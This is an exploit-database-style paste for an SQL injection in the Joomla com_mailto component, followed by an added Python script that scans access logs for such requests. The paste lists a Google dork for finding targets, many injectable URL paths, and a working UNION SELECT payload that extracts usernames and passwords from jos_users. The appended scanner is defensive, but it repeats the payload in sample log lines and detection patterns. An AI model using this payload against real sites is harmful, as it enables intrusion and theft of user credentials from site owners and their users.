- #H4M4573R
- ####################################################################
- # Exploit Title : Joomla Mailto Components 1.2.2.2 SQL Injection
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_mailto''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_mailto&tmpl=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&type=raw&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=mailto&article=[SQL Injection]&Itemid=1
- /index.php?option=com_mailto&tmpl=mailto&article=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=gantry&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=skyextend-fjt&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=kallyas&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=ca_cloudbase2_j25&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=jf_texturia&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=jsn_boot_pro&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=jm-business-marketing&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=findario1.7&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=beez_20&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=allrounder-j1.6&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=siteground-j16-41&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=nagariknews&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=sarmuni&link=[SQL Injection]
- # Example SQL Injection Exploit Payload :
- *************************************
- +and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--
- +and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--&Itemid=1
- ####################################################################
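Added example (not part of the original paste): a log check a site operator can run to spot requests that put SQL tokens into the com_mailto parameters listed above. The log lines are constructed, and the function names, the token patterns and the numeric-only rule for article and Itemid are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the paste lists as injection points for com_mailto.
WATCHED = {"tmpl", "link", "article", "Itemid", "template"}
# Assumption of this example: these two only ever carry an integer id.
NUMERIC = {"article", "Itemid"}
# SQL tokens of the kind shown in the paste's payload, matched after URL decoding.
SQLI = re.compile(
    r"\bunion\b.+\bselect\b|\band\s+\d+\s*=\s*\d+|\bconcat\s*\("
    r"|\bchar\s*\(\d+\)|\bfrom\s+\w*_users\b|--\s*$",
    re.IGNORECASE | re.DOTALL)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed access-log lines using documentation addresses
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_mailto&tmpl=component&link=aHR0cDovL2V4YW1wbGUub3Jn HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_mailto&tmpl=component&link=x+and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users-- HTTP/1.1" 200 7311',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_mailto&tmpl=mailto&article=12&Itemid=1%27 HTTP/1.1" 500 310',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9000',
]

def inspect_line(line):
    """Return (param, reason) findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    # parse_qsl decodes %xx escapes and turns '+' into a space.
    params = parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True)
    if ("option", "com_mailto") not in params:
        return []
    findings = []
    for name, value in params:
        if name not in WATCHED:
            continue
        if SQLI.search(value):
            findings.append((name, "sql-token"))
        elif name in NUMERIC and value and not value.isdigit():
            findings.append((name, "non-numeric-id"))
    return findings

def scan(lines):
    """Return [(line_number, findings)] for lines with at least one finding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = inspect_line(line)
        if findings:
            hits.append((number, findings))
    return hits
```

Calling `scan()` on an iterable of real access-log lines gives the line numbers to review; the token list is a starting point and will not catch encodings it does not decode.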